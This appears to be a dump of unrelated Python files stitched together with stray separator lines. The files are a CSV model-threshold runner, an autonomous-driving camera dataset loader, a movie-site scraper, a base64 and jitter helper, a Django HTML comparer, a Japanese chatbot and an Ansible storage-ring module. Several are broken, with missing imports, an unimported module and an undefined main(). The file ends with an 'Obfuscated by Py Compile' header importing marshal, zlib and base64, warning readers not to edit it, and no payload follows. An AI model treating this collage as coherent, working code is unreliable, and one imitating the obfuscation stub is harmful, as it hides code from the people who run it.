from prm.model_distribution.db import ModelDatabase, DatabaseError
from prm.analyze.analyzer import ThreshType
from wca.config import Path
import pandas as pd
log = logging.getLogger(__name__)
class ImproperCSVFilePath(Exception):
"""
Improper CSV file path
"""
pass
class ImproperCSVFileColumns(Exception):
"""
Improper CSV file columns
"""
pass
class BuildRunnerCSV(Runner):
"""
Using CSV data to build model thresholds and store them in zookeeper.
Arguments:
file_path: the file_path of the csv file
database: model storage database, get/set api is provided
model: threshold analyzer
"""
def __init__(
self,
file_path: Path,
database: ModelDatabase,
model: DistriModel,
):
self._file_path = file_path
self._model = model
self._database = database
self._finish = False
self.default_columns = {Metric.NAME, Metric.CPU_MODEL,
Metric.VCPU_COUNT, Metric.MB,
Metric.CPI, Metric.L3MPKI,
Metric.NF, Metric.UTIL, Metric.MSPKI}
def _initialize(self):
"""Three-level nested dict example:
{
cpu_model1:{
application1:{
cpu_assignment1:{
threshold}
}
}
}
"""
if splitext(self._file_path)[1] != '.csv':
raise ImproperCSVFilePath("Please provide a csv file path.")
# initialize a three-level nested dict
self.target = defaultdict(lambda: defaultdict(dict))
def run(self) -> int:
log.info('model-distribution runner is started!')
self._initialize()
while True:
self._iterate()
if self._finish:
break
return 0
def _iterate(self):
df = pd.read_csv(self._file_path)
if not self.default_columns.issubset(set(df.columns)):
raise ImproperCSVFileColumns("The csv's columns {} and default "
"columns {} do not match".format(
set(df.columns),
self.default_columns))
model_keys = df.groupby([Metric.CPU_MODEL, Metric.NAME, Metric.VCPU_COUNT]).groups.keys()
for model_key in model_keys:
# filter dataframe by cpu_model, application, cpu_assignment
if any(str(v) == 'nan' for v in model_key):
continue
dataframe = df[(df[Metric.CPU_MODEL] == model_key[0]) &
(df[Metric.NAME] == model_key[1]) &
(df[Metric.VCPU_COUNT] == model_key[2])]
cpu_number = model_key[2]
tdp_thresh, thresholds = self._model.build_model(dataframe, cpu_number)
value = {ThreshType.TDP.value: tdp_thresh, ThreshType.METRICS.value: thresholds}
self.target[model_key[0]][model_key[1]][model_key[2]] = value
self._store_database(self.target)
self._finish = True
def _store_database(self, target):
for key, value in target.items():
try:
self._database.set(key, dict(value))
except DatabaseError as e:
log.error("failed to set key-value to the database: {}".format(e))
|
python
|
# Copyright 2020 Toyota Research Institute. All rights reserved.
import os
import torch
import numpy as np
from dgp.datasets.synchronized_dataset import SynchronizedSceneDataset
from dgp.utils.camera import Camera, generate_depth_map
from dgp.utils.geometry import Pose
from packnet_sfm.geometry.pose_utils import invert_pose_numpy
from packnet_sfm.utils.misc import make_list
from packnet_sfm.utils.types import is_tensor, is_numpy, is_list, is_str
cam_left_dict = {
'1': '5',
'5': '7',
'6': '1',
'7': '9',
'8': '6',
'9': '8',
}
cam_right_dict = {
'1': '6',
'5': '1',
'6': '8',
'7': '5',
'8': '9',
'9': '7',
}
########################################################################################################################
#### FUNCTIONS
########################################################################################################################
def stack_sample(sample):
"""Stack a sample from multiple sensors"""
# If there is only one sensor don't do anything
if len(sample) == 1:
return sample[0]
# Otherwise, stack sample
stacked_sample = {}
for key in sample[0]:
# Global keys (do not stack)
if key in ['idx', 'dataset_idx']:#['idx', 'dataset_idx', 'sensor_name', 'filename']:
stacked_sample[key] = sample[0][key]
else:
# Stack torch tensors
if is_str(sample[0][key]):
stacked_sample[key] = [s[key] for s in sample]
elif is_tensor(sample[0][key]):
stacked_sample[key] = torch.stack([s[key] for s in sample], 0)
# Stack numpy arrays
elif is_numpy(sample[0][key]):
stacked_sample[key] = np.stack([s[key] for s in sample], 0)
# Stack list
elif is_list(sample[0][key]):
stacked_sample[key] = []
if is_str(sample[0][key][0]):
for i in range(len(sample)):
stacked_sample[key].append(sample[i][key])
# Stack list of torch tensors
if is_tensor(sample[0][key][0]):
for i in range(len(sample[0][key])):
stacked_sample[key].append(
torch.stack([s[key][i] for s in sample], 0))
# Stack list of numpy arrays
if is_numpy(sample[0][key][0]):
for i in range(len(sample[0][key])):
stacked_sample[key].append(
np.stack([s[key][i] for s in sample], 0))
# Return stacked sample
return stacked_sample
########################################################################################################################
#### DATASET
########################################################################################################################
class DGPvaleoDataset:
"""
DGP dataset class
Parameters
----------
path : str
Path to the dataset
split : str {'train', 'val', 'test'}
Which dataset split to use
cameras : list of str
Which cameras to get information from
depth_type : str
Which lidar will be used to generate ground-truth information
with_pose : bool
If enabled pose estimates are also returned
with_semantic : bool
If enabled semantic estimates are also returned
back_context : int
Size of the backward context
forward_context : int
Size of the forward context
data_transform : Function
Transformations applied to the sample
"""
def __init__(self, path, split,
cameras=None,
depth_type=None,
with_pose=False,
with_semantic=False,
back_context=0,
forward_context=0,
data_transform=None,
with_geometric_context=False,
):
self.path = path
self.split = split
self.dataset_idx = 0
self.bwd = back_context
self.fwd = forward_context
self.has_context = back_context + forward_context > 0
self.with_geometric_context = with_geometric_context
self.num_cameras = len(cameras)
self.data_transform = data_transform
self.depth_type = depth_type
self.with_depth = depth_type is not None
self.with_pose = with_pose
self.with_semantic = with_semantic
# arrange cameras alphabetically
cameras = sorted(cameras)
cameras_left = list(cameras)
cameras_right = list(cameras)
for i_cam in range(self.num_cameras):
replaced = False
for k in cam_left_dict:
if not replaced and k in cameras_left[i_cam]:
cameras_left[i_cam] = cameras_left[i_cam].replace(k, cam_left_dict[k])
replaced = True
replaced = False
for k in cam_right_dict:
if not replaced and k in cameras_right[i_cam]:
cameras_right[i_cam] = cameras_right[i_cam].replace(k, cam_right_dict[k])
replaced = True
print(cameras)
print(cameras_left)
print(cameras_right)
# arrange cameras left and right and extract sorting indices
self.cameras_left_sort_idxs = list(np.argsort(cameras_left))
self.cameras_right_sort_idxs = list(np.argsort(cameras_right))
cameras_left_sorted = sorted(cameras_left)
cameras_right_sorted = sorted(cameras_right)
self.dataset = SynchronizedSceneDataset(path,
split=split,
datum_names=cameras,
backward_context=back_context,
forward_context=forward_context,
requested_annotations=None,
only_annotated_datums=False,
)
if self.with_geometric_context:
self.dataset_left = SynchronizedSceneDataset(path,
split=split,
datum_names=cameras_left_sorted,
backward_context=back_context,
forward_context=forward_context,
requested_annotations=None,
only_annotated_datums=False,
)
self.dataset_right = SynchronizedSceneDataset(path,
split=split,
datum_names=cameras_right_sorted,
backward_context=back_context,
forward_context=forward_context,
requested_annotations=None,
only_annotated_datums=False,
)
@staticmethod
def _get_base_folder(image_file):
"""The base folder"""
return '/'.join(image_file.split('/')[:-4])
@staticmethod
def _get_sequence_name(image_file):
"""Returns a sequence name like '20180227_185324'."""
return image_file.split('/')[-4]
@staticmethod
def _get_camera_name(image_file):
"""Returns 'cam_i', i between 0 and 4"""
return image_file.split('/')[-2]
def _get_path_to_ego_mask(self, image_file):
"""Get the current folder from image_file."""
return os.path.join(self._get_base_folder(image_file),
self._get_sequence_name(image_file),
'semantic_masks',
self._get_camera_name(image_file) + '.npy')
def generate_depth_map(self, sample_idx, datum_idx, filename):
"""
Generates the depth map for a camera by projecting LiDAR information.
It also caches the depth map following DGP folder structure, so it's not recalculated
Parameters
----------
sample_idx : int
sample index
datum_idx : int
Datum index
filename :
Filename used for loading / saving
Returns
-------
depth : np.array [H, W]
Depth map for that datum in that sample
"""
# Generate depth filename
filename = '{}/{}.npz'.format(
os.path.dirname(self.path), filename.format('depth/{}'.format(self.depth_type)))
# Load and return if exists
if os.path.exists(filename):
return np.load(filename, allow_pickle=True)['depth']
# Otherwise, create, save and return
else:
# Get pointcloud
scene_idx, sample_idx_in_scene, _ = self.dataset.dataset_item_index[sample_idx]
pc_datum_idx_in_sample = self.dataset.get_datum_index_for_datum_name(
scene_idx, sample_idx_in_scene, self.depth_type)
pc_datum_data = self.dataset.get_point_cloud_from_datum(
scene_idx, sample_idx_in_scene, pc_datum_idx_in_sample)
# Create camera
camera_rgb = self.get_current('rgb', datum_idx)
camera_pose = self.get_current('pose', datum_idx)
camera_intrinsics = self.get_current('intrinsics', datum_idx)
camera = Camera(K=camera_intrinsics, p_cw=camera_pose.inverse())
# Generate depth map
world_points = pc_datum_data['pose'] * pc_datum_data['point_cloud']
depth = generate_depth_map(camera, world_points, camera_rgb.size[::-1])
# Save depth map
os.makedirs(os.path.dirname(filename), exist_ok=True)
np.savez_compressed(filename, depth=depth)
# Return depth map
return depth
def get_current(self, key, sensor_idx):
"""Return current timestep of a key from a sensor"""
return self.sample_dgp[self.bwd][sensor_idx][key]
def get_current_left(self, key, sensor_idx):
"""Return current timestep of a key from a sensor"""
return self.sample_dgp_left[self.bwd][sensor_idx][key]
def get_current_right(self, key, sensor_idx):
"""Return current timestep of a key from a sensor"""
return self.sample_dgp_right[self.bwd][sensor_idx][key]
def get_backward(self, key, sensor_idx):
"""Return backward timesteps of a key from a sensor"""
return [] if self.bwd == 0 else \
[self.sample_dgp[i][sensor_idx][key] \
for i in range(0, self.bwd)]
def get_backward_left(self, key, sensor_idx):
"""Return backward timesteps of a key from a sensor"""
return [] if self.bwd == 0 else \
[self.sample_dgp_left[i][sensor_idx][key] \
for i in range(0, self.bwd)]
def get_backward_right(self, key, sensor_idx):
"""Return backward timesteps of a key from a sensor"""
return [] if self.bwd == 0 else \
[self.sample_dgp_right[i][sensor_idx][key] \
for i in range(0, self.bwd)]
def get_forward(self, key, sensor_idx):
"""Return forward timestep of a key from a sensor"""
return [] if self.fwd == 0 else \
[self.sample_dgp[i][sensor_idx][key] \
for i in range(self.bwd + 1, self.bwd + self.fwd + 1)]
def get_forward_left(self, key, sensor_idx):
"""Return forward timestep of a key from a sensor"""
return [] if self.fwd == 0 else \
[self.sample_dgp_left[i][sensor_idx][key] \
for i in range(self.bwd + 1, self.bwd + self.fwd + 1)]
def get_forward_right(self, key, sensor_idx):
"""Return forward timestep of a key from a sensor"""
return [] if self.fwd == 0 else \
[self.sample_dgp_right[i][sensor_idx][key] \
for i in range(self.bwd + 1, self.bwd + self.fwd + 1)]
def get_context(self, key, sensor_idx):
"""Get both backward and forward contexts"""
return self.get_backward(key, sensor_idx) + self.get_forward(key, sensor_idx)
def get_context_left(self, key, sensor_idx):
"""Get both backward and forward contexts"""
return self.get_backward_left(key, sensor_idx) + self.get_forward_left(key, sensor_idx)
def get_context_right(self, key, sensor_idx):
"""Get both backward and forward contexts"""
return self.get_backward_right(key, sensor_idx) + self.get_forward_right(key, sensor_idx)
def get_filename(self, sample_idx, datum_idx):
"""
Returns the filename for an index, following DGP structure
Parameters
----------
sample_idx : int
Sample index
datum_idx : int
Datum index
Returns
-------
filename : str
Filename for the datum in that sample
"""
scene_idx, sample_idx_in_scene, datum_indices = self.dataset.dataset_item_index[sample_idx]
scene_dir = self.dataset.get_scene_directory(scene_idx)
filename = self.dataset.get_datum(
scene_idx, sample_idx_in_scene, datum_indices[datum_idx]).datum.image.filename
return os.path.splitext(os.path.join(os.path.basename(scene_dir),
filename.replace('rgb', '{}')))[0]
def get_filename_left(self, sample_idx, datum_idx):
"""
Returns the filename for an index, following DGP structure
Parameters
----------
sample_idx : int
Sample index
datum_idx : int
Datum index
Returns
-------
filename : str
Filename for the datum in that sample
"""
scene_idx, sample_idx_in_scene, datum_indices = self.dataset_left.dataset_item_index[sample_idx]
scene_dir = self.dataset_left.get_scene_directory(scene_idx)
filename = self.dataset_left.get_datum(
scene_idx, sample_idx_in_scene, datum_indices[datum_idx]).datum.image.filename
return os.path.splitext(os.path.join(os.path.basename(scene_dir),
filename.replace('rgb', '{}')))[0]
def get_filename_right(self, sample_idx, datum_idx):
"""
Returns the filename for an index, following DGP structure
Parameters
----------
sample_idx : int
Sample index
datum_idx : int
Datum index
Returns
-------
filename : str
Filename for the datum in that sample
"""
scene_idx, sample_idx_in_scene, datum_indices = self.dataset_right.dataset_item_index[sample_idx]
scene_dir = self.dataset_right.get_scene_directory(scene_idx)
filename = self.dataset_right.get_datum(
scene_idx, sample_idx_in_scene, datum_indices[datum_idx]).datum.image.filename
return os.path.splitext(os.path.join(os.path.basename(scene_dir),
filename.replace('rgb', '{}')))[0]
def get_camera_idx_left(self, camera_idx):
return self.cameras_left_sort_idxs[camera_idx]
def get_camera_idx_right(self, camera_idx):
return self.cameras_right_sort_idxs[camera_idx]
def __len__(self):
"""Length of dataset"""
return len(self.dataset)
def __getitem__(self, idx):
"""Get a dataset sample"""
# Get DGP sample (if single sensor, make it a list)
self.sample_dgp = self.dataset[idx]
self.sample_dgp = [make_list(sample) for sample in self.sample_dgp]
if self.with_geometric_context:
self.sample_dgp_left = self.dataset_left[idx]
self.sample_dgp_left = [make_list(sample) for sample in self.sample_dgp_left]
self.sample_dgp_right = self.dataset_right[idx]
self.sample_dgp_right = [make_list(sample) for sample in self.sample_dgp_right]
# print('self.sample_dgp :')
# print(self.sample_dgp)
# print('self.sample_dgp_left :')
# print(self.sample_dgp_left)
# print('self.sample_dgp_right :')
# print(self.sample_dgp_right)
# Loop over all cameras
sample = []
for i in range(self.num_cameras):
i_left = self.get_camera_idx_left(i)
i_right = self.get_camera_idx_right(i)
# print(self.get_current('datum_name', i))
# print(self.get_filename(idx, i))
# print(self.get_current('intrinsics', i))
# print(self.with_depth)
data = {
'idx': idx,
'dataset_idx': self.dataset_idx,
'sensor_name': self.get_current('datum_name', i),
#
'filename': self.get_filename(idx, i),
'splitname': '%s_%010d' % (self.split, idx),
#
'rgb': self.get_current('rgb', i),
'intrinsics': self.get_current('intrinsics', i),
'extrinsics': self.get_current('extrinsics', i).matrix,
'path_to_ego_mask': os.path.join(os.path.dirname(self.path), self._get_path_to_ego_mask(self.get_filename(idx, i))),
}
# If depth is returned
if self.with_depth:
data.update({
'depth': self.generate_depth_map(idx, i, data['filename'])
})
# If pose is returned
if self.with_pose:
data.update({
'pose': self.get_current('pose', i).matrix,
})
if self.has_context:
orig_extrinsics = Pose.from_matrix(data['extrinsics'])
data.update({
'rgb_context': self.get_context('rgb', i),
'intrinsics_context': self.get_context('intrinsics', i),
'extrinsics_context':
[(extrinsics.inverse() * orig_extrinsics).matrix
for extrinsics in self.get_context('extrinsics', i)],
})
data.update({
'path_to_ego_mask_context': [os.path.join(os.path.dirname(self.path), self._get_path_to_ego_mask(self.get_filename(idx, i)))
for _ in range(len(data['rgb_context']))],
})
data.update({
'context_type': [],
})
for _ in range(self.bwd):
data['context_type'].append('backward')
for _ in range(self.fwd):
data['context_type'].append('forward')
# If context pose is returned
if self.with_pose:
# Get original values to calculate relative motion
orig_pose = Pose.from_matrix(data['pose'])
data.update({
'pose_context':
[(orig_pose.inverse() * pose).matrix
for pose in self.get_context('pose', i)],
})
if self.with_geometric_context:
orig_extrinsics = data['extrinsics']
#orig_extrinsics[:3,3] = -np.dot(orig_extrinsics[:3,:3].transpose(), orig_extrinsics[:3,3])
orig_extrinsics_left = self.get_current_left('extrinsics', i_left).matrix
orig_extrinsics_right = self.get_current_right('extrinsics', i_right).matrix
#orig_extrinsics_left[:3,3] = -np.dot(orig_extrinsics_left[:3,:3].transpose(), orig_extrinsics_left[:3,3])
#orig_extrinsics_right[:3,3] = -np.dot(orig_extrinsics_right[:3,:3].transpose(), orig_extrinsics_right[:3,3])
orig_extrinsics = Pose.from_matrix(orig_extrinsics)
orig_extrinsics_left = Pose.from_matrix(orig_extrinsics_left)
orig_extrinsics_right = Pose.from_matrix(orig_extrinsics_right)
data['rgb_context'].append(self.get_current_left('rgb', i_left))
data['rgb_context'].append(self.get_current_right('rgb', i_right))
data['intrinsics_context'].append(self.get_current_left('intrinsics', i_left))
data['intrinsics_context'].append(self.get_current_right('intrinsics', i_right))
data['extrinsics_context'].append((orig_extrinsics_left.inverse() * orig_extrinsics).matrix)
data['extrinsics_context'].append((orig_extrinsics_right.inverse() * orig_extrinsics).matrix)
#data['extrinsics_context'].append((orig_extrinsics.inverse() * orig_extrinsics_left).matrix)
#data['extrinsics_context'].append((orig_extrinsics.inverse() * orig_extrinsics_right).matrix)
data['path_to_ego_mask_context'].append(os.path.join(os.path.dirname(self.path),
self._get_path_to_ego_mask(self.get_filename_left(idx, i_left))))
data['path_to_ego_mask_context'].append(os.path.join(os.path.dirname(self.path),
self._get_path_to_ego_mask(self.get_filename_right(idx, i_right))))
data['context_type'].append('left')
data['context_type'].append('right')
data.update({
'sensor_name_left': self.get_current_left('datum_name', i_left),
'sensor_name_right': self.get_current_right('datum_name', i_right),
#
'filename_left': self.get_filename_left(idx, i_left),
'filename_right': self.get_filename_right(idx, i_right),
#
#'rgb_left': self.get_current_left('rgb', i),
#'rgb_right': self.get_current_right('rgb', i),
#'intrinsics_left': self.get_current_left('intrinsics', i),
#'intrinsics_right': self.get_current_right('intrinsics', i),
#'extrinsics_left': self.get_current_left('extrinsics', i).matrix,
#'extrinsics_right': self.get_current_right('extrinsics', i).matrix,
#'path_to_ego_mask_left': self._get_path_to_ego_mask(self.get_filename_left(idx, i)),
#'path_to_ego_mask_right': self._get_path_to_ego_mask(self.get_filename_right(idx, i)),
})
# data.update({
# 'extrinsics_context_left':
# [(orig_extrinsics_left.inverse() * extrinsics_left).matrix
# for extrinsics_left in self.get_context_left('extrinsics', i)],
# 'extrinsics_context_right':
# [(orig_extrinsics_right.inverse() * extrinsics_right).matrix
# for extrinsics_right in self.get_context_right('extrinsics', i)],
# 'intrinsics_context_left': self.get_context_left('intrinsics', i),
# 'intrinsics_context_right': self.get_context_right('intrinsics', i),
# })
sample.append(data)
# Apply same data transformations for all sensors
if self.data_transform:
sample = [self.data_transform(smp) for smp in sample]
# Return sample (stacked if necessary)
return stack_sample(sample)
########################################################################################################################
|
python
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.http import Request
from scrapy.selector import Selector
from scrapy_doubanmovie.scrapy_doubanmovie.items import ScrapyDoubanmovieItem
from urllib.parse import urljoin
# 通过scrapy genspider douban_spider movie.douban.com生成的
class DoubanSpiderSpider(scrapy.Spider):
# 爬虫名字
name = 'douban_spider'
# 允许的域名
allowed_domains = ['movie.douban.com']
# 入口URL,扔到调度器里面
start_urls = ['https://movie.douban.com/top250']
def parse(self, response):
item = ScrapyDoubanmovieItem()
selector = Selector(response)
Movies = selector.xpath('//div[@class="info"]')
for eachMovie in Movies:
title = eachMovie.xpath('div[@class="hd"]/a/span/text()').extract() # 多个span标签
fullTitle = "".join(title) # 将多个字符串无缝连接起来
introduce = eachMovie.xpath('div[@class="bd"]/p/text()').extract()
star = eachMovie.xpath('div[@class="bd"]/div[@class="star"]/span/text()').extract()[0]
evaluate = eachMovie.xpath('div[@class="bd"]/div[@class="star"]/span/text()').extract()[1]
quote = eachMovie.xpath('div[@class="bd"]/p[@class="quote"]/span/text()').extract()
# quote可能为空,因此需要先进行判断
if quote:
quote = quote[0]
else:
quote = ''
item['title'] = fullTitle
item['introduce'] = ';'.join([x.strip() for x in introduce if x.strip() != ''])
item['star'] = star
item['evaluate'] = evaluate
item['quote'] = quote
yield item
nextLink = selector.xpath('//span[@class="next"]/link/@href').extract()
# 第10页是最后一页,没有下一页的链接
if nextLink:
nextLink = nextLink[0]
yield Request(urljoin(response.url, nextLink), callback=self.parse)
|
python
|
from base64 import b64encode, b64decode
from random import randint
class UtilityService:
@staticmethod
def decode_bytes(s):
return b64decode(s).decode('utf-8')
@staticmethod
def encode_string(s):
return str(b64encode(s.encode()), 'utf-8')
@staticmethod
def jitter(fraction):
i = fraction.split('/')
return randint(int(i[0]), int(i[1]))
|
python
|
"""Compare two HTML documents."""
from html.parser import HTMLParser
from django.utils.regex_helper import _lazy_re_compile
# ASCII whitespace is U+0009 TAB, U+000A LF, U+000C FF, U+000D CR, or U+0020
# SPACE.
# https://infra.spec.whatwg.org/#ascii-whitespace
ASCII_WHITESPACE = _lazy_re_compile(r'[\t\n\f\r ]+')
def normalize_whitespace(string):
return ASCII_WHITESPACE.sub(' ', string)
class Element:
def __init__(self, name, attributes):
self.name = name
self.attributes = sorted(attributes)
self.children = []
def append(self, element):
if isinstance(element, str):
element = normalize_whitespace(element)
if self.children and isinstance(self.children[-1], str):
self.children[-1] += element
self.children[-1] = normalize_whitespace(self.children[-1])
return
elif self.children:
# removing last children if it is only whitespace
# this can result in incorrect dom representations since
# whitespace between inline tags like <span> is significant
if isinstance(self.children[-1], str) and self.children[-1].isspace():
self.children.pop()
if element:
self.children.append(element)
def finalize(self):
def rstrip_last_element(children):
if children and isinstance(children[-1], str):
children[-1] = children[-1].rstrip()
if not children[-1]:
children.pop()
children = rstrip_last_element(children)
return children
rstrip_last_element(self.children)
for i, child in enumerate(self.children):
if isinstance(child, str):
self.children[i] = child.strip()
elif hasattr(child, 'finalize'):
child.finalize()
def __eq__(self, element):
if not hasattr(element, 'name') or self.name != element.name:
return False
if len(self.attributes) != len(element.attributes):
return False
if self.attributes != element.attributes:
# attributes without a value is same as attribute with value that
# equals the attributes name:
# <input checked> == <input checked="checked">
for i in range(len(self.attributes)):
attr, value = self.attributes[i]
other_attr, other_value = element.attributes[i]
if value is None:
value = attr
if other_value is None:
other_value = other_attr
if attr != other_attr or value != other_value:
return False
return self.children == element.children
def __hash__(self):
return hash((self.name, *self.attributes))
def _count(self, element, count=True):
if not isinstance(element, str) and self == element:
return 1
if isinstance(element, RootElement) and self.children == element.children:
return 1
i = 0
elem_child_idx = 0
for child in self.children:
# child is text content and element is also text content, then
# make a simple "text" in "text"
if isinstance(child, str):
if isinstance(element, str):
if count:
i += child.count(element)
elif element in child:
return 1
else:
# Look for element wholly within this child.
i += child._count(element, count=count)
if not count and i:
return i
# Also look for a sequence of element's children among self's
# children. self.children == element.children is tested above,
# but will fail if self has additional children. Ex: '<a/><b/>'
# is contained in '<a/><b/><c/>'.
if isinstance(element, RootElement) and element.children:
elem_child = element.children[elem_child_idx]
# Start or continue match, advance index.
if elem_child == child:
elem_child_idx += 1
# Match found, reset index.
if elem_child_idx == len(element.children):
i += 1
elem_child_idx = 0
# No match, reset index.
else:
elem_child_idx = 0
return i
def __contains__(self, element):
return self._count(element, count=False) > 0
def count(self, element):
return self._count(element, count=True)
def __getitem__(self, key):
return self.children[key]
def __str__(self):
output = '<%s' % self.name
for key, value in self.attributes:
if value:
output += ' %s="%s"' % (key, value)
else:
output += ' %s' % key
if self.children:
output += '>\n'
output += ''.join(str(c) for c in self.children)
output += '\n</%s>' % self.name
else:
output += '>'
return output
def __repr__(self):
return str(self)
class RootElement(Element):
def __init__(self):
super().__init__(None, ())
def __str__(self):
return ''.join(str(c) for c in self.children)
class HTMLParseError(Exception):
pass
class Parser(HTMLParser):
# https://html.spec.whatwg.org/#void-elements
SELF_CLOSING_TAGS = {
'area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input', 'link', 'meta',
'param', 'source', 'track', 'wbr',
# Deprecated tags
'frame', 'spacer',
}
def __init__(self):
super().__init__()
self.root = RootElement()
self.open_tags = []
self.element_positions = {}
def error(self, msg):
raise HTMLParseError(msg, self.getpos())
def format_position(self, position=None, element=None):
if not position and element:
position = self.element_positions[element]
if position is None:
position = self.getpos()
if hasattr(position, 'lineno'):
position = position.lineno, position.offset
return 'Line %d, Column %d' % position
@property
def current(self):
if self.open_tags:
return self.open_tags[-1]
else:
return self.root
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
if tag not in self.SELF_CLOSING_TAGS:
self.handle_endtag(tag)
def handle_starttag(self, tag, attrs):
# Special case handling of 'class' attribute, so that comparisons of DOM
# instances are not sensitive to ordering of classes.
attrs = [
(name, ' '.join(sorted(value for value in ASCII_WHITESPACE.split(value) if value)))
if name == "class"
else (name, value)
for name, value in attrs
]
element = Element(tag, attrs)
self.current.append(element)
if tag not in self.SELF_CLOSING_TAGS:
self.open_tags.append(element)
self.element_positions[element] = self.getpos()
def handle_endtag(self, tag):
if not self.open_tags:
self.error("Unexpected end tag `%s` (%s)" % (
tag, self.format_position()))
element = self.open_tags.pop()
while element.name != tag:
if not self.open_tags:
self.error("Unexpected end tag `%s` (%s)" % (
tag, self.format_position()))
element = self.open_tags.pop()
def handle_data(self, data):
self.current.append(data)
def parse_html(html):
"""
Take a string that contains HTML and turn it into a Python object structure
that can be easily compared against other HTML on semantic equivalence.
Syntactical differences like which quotation is used on arguments will be
ignored.
"""
parser = Parser()
parser.feed(html)
parser.close()
document = parser.root
document.finalize()
# Removing ROOT element if it's not necessary
if len(document.children) == 1 and not isinstance(document.children[0], str):
document = document.children[0]
return document
|
python
|
# coding:utf-8
import MeCab
import codecs
from model import Seq2Seq
import chainer
import json
import sys
import io
class Chatbot:
def __init__(self, dirname):
self.dir = 'model/' + dirname + '/'
self.dict_i2w = self.dir + 'dictionary_i2w.json'
self.dict_w2i = self.dir + 'dictionary_w2i.json'
self.modelname = self.dir + 'model.npz'
def initialize(self):
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
self.tagger = MeCab.Tagger('-Owakati')
self.id2word = json.load(open(self.dict_i2w, "r"))
self.id2word = {int(key): value for key, value in self.id2word.items()}
self.word2id = json.load(open(self.dict_w2i, "r"))
self.model = Seq2Seq(input_words=len(self.word2id), train=False)
chainer.serializers.load_npz(self.modelname, self.model)
def get_reply(self,message):
try:
parsed_sentence = []
sentence = self.tagger.parse(message)[:-1]
for surface in sentence.split(' '):
parsed_sentence.append(surface)
parsed_sentence = ["<start>"] + parsed_sentence + ["<eos>"]
ids = []
for word in parsed_sentence:
if word in self.word2id:
id = self.word2id[word]
ids.append(id)
else:
ids.append(0)
ids_question = ids
sentence = "".join(self.model.generate_sentence(ids_question, dictionary=self.id2word)).encode("utf-8")
return sentence.decode('utf-8')
except Exception as e:
return e, '解析できませんでした。。。'
if __name__ == "__main__":
main()
|
python
|
#!/usr/bin/python
#coding: utf-8 -*-
#
# (c) 2014, Craig Tracey <[email protected]>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
author: Craig Tracey
'''
import os
from subprocess import check_call, CalledProcessError
def _run_ring_command(module, command, builder_file, force, *args):
cmd = ['swift-ring-builder', builder_file, command] + list(args)
try:
rc = subprocess.check_call(cmd)
except Exception as e:
module.fail_json(msg="Error running swift-ring-builder command %s'" %
(e.message, " ".join(cmd)))
return True
def swift_ring_create(module, builder_file, part_power, replicas,
min_part_hours, force=False):
return _run_ring_command(module, 'create', builder_file, force,
part_power, replicas, min_part_hours)
def swift_ring_add(module, builder_file, zone, ip, port, device_name, meta,
weight, force=False):
device_str = "z%(zone)s-%(ip)s:%(port)s/%(device_name)s_%(meta)s" % \
locals()
return _run_ring_command(module, 'add', builder_file, force,
device_str, weight)
def swift_ring_rebalance(module, builder_file, ring_type, force=False):
if not force and os.path.exists("/etc/swift/%s.ring.gz" % ring_type):
return False
return _run_ring_command(module, 'rebalance', builder_file, force)
def main():
module = AnsibleModule(
argument_spec=dict(
action=dict(required=True,
choices=['create', 'add', 'rebalance']),
ring_type=dict(required=True,
choices=['account', 'container', 'object']),
builder_file=dict(required=True),
part_power=dict(required=False),
replicas=dict(required=False),
min_part_hours=dict(required=False),
zone=dict(required=False),
ip=dict(required=False),
port=dict(required=False),
device_name=dict(required=False),
meta=dict(required=False),
weight=dict(required=False),
force=dict(required=False, default=False)
)
)
changed = False
params = module.params
if params['action'] == 'create':
changed = swift_ring_create(module,
params['builder_file'],
params['part_power'],
params['replicas'],
params['min_part_hours'],
params['force'])
elif params['action'] == 'add':
changed = swift_ring_add(module,
params['builder_file'],
params['zone'],
params['ip'],
params['port'],
params['device_name'],
params['meta'],
params['weight'],
params['force'])
elif params['action'] == 'rebalance':
changed = swift_ring_rebalance(module,
params['builder_file'],
params['ring_type'],
params['force'])
module.exit_json(changed=changed)
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
|
python
|
# Obfuscated by Py Compile
# Created by Wh!73 D3v!1 (https://github.com/WHI73-D3VI1)
# Facebook : (https://www.facebook.com/WHI73.D3VI1)
# Don't try to edit or modify this tool
import marshal,zlib,base64
